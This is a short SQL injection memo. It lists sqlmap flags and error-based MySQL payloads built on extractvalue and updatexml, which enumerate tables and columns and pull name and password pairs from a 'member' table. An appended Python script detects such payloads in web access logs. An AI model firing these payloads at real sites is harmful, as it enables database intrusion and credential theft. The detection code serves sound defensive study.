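1. Detailed sqlmap method:
https://www.cnblogs.com/qtisec/p/11097191.html
Note: marking the injection point with *, e.g. id:*, tells sqlmap to inject only at id; the parameter to test can also be specified with sqlmap -p id
--batch: accept the default for every prompt, so the user is not asked for confirmation
--dump: dump the DBMS table entries
2. Manual injection:
For the extractvalue statement, see: https://blog.csdn.net/bangyan3903/article/details/101788019
For the manual procedure, see: https://blog.csdn.net/mutou990/article/details/107761999
Examples: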
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1' ='1
' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='webcalendar'),0x7e)) and '1' ='1
' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='member'),0x7e)) and '1' ='1
' and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,name,0x3a,password,0x23) FROM member limit 0,1),0x7e),1) and '1'='1
Use the two in combination!
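
One way to spot the extractvalue/updatexml error-based pattern above in web server access logs, as an added example that is not part of the original note. The request lines (including the /calendar.php and /search.php paths) are constructed, and the indicator names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators of the XPath error-based technique shown in the payloads above.
INDICATORS = [
    ("xpath_error_func", re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I)),
    ("hex_concat", re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I)),
]

def match_indicators(value):
    """Names of the indicators found in one URL-decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]

def scan_request(request_line):
    """Map each suspicious query parameter of 'METHOD target HTTP/x' to its indicators."""
    parts = request_line.split()
    if len(parts) < 2:
        return {}
    flagged = {}
    for param, value in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        hits = match_indicators(value)
        # Require the XPath function plus one corroborating indicator, so a
        # search for the word "updatexml" alone is not reported.
        if "xpath_error_func" in hits and len(hits) >= 2:
            flagged[param] = hits
    return flagged

# Constructed request lines (hypothetical endpoints), not taken from a real log.
SAMPLE_LOG = [
    "GET /calendar.php?id=42&view=month HTTP/1.1",
    "GET /calendar.php?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))%20and%20%271%27=%271 HTTP/1.1",
    "GET /search.php?q=updatexml+function+docs HTTP/1.1",
    "GET /calendar.php?id=1%27+and+extractvalue(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables),0x7e))--+ HTTP/1.1",
]

def scan_log(lines):
    """Return (line_number, flagged_params) for every line with a finding."""
    findings = []
    for n, line in enumerate(lines, 1):
        flagged = scan_request(line)
        if flagged:
            findings.append((n, flagged))
    return findings

if __name__ == "__main__":
    for n, flagged in scan_log(SAMPLE_LOG):
        print(n, flagged)
```

The scan covers only the query string of the request line; POST bodies, headers and cookies need the same check applied to their decoded values.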
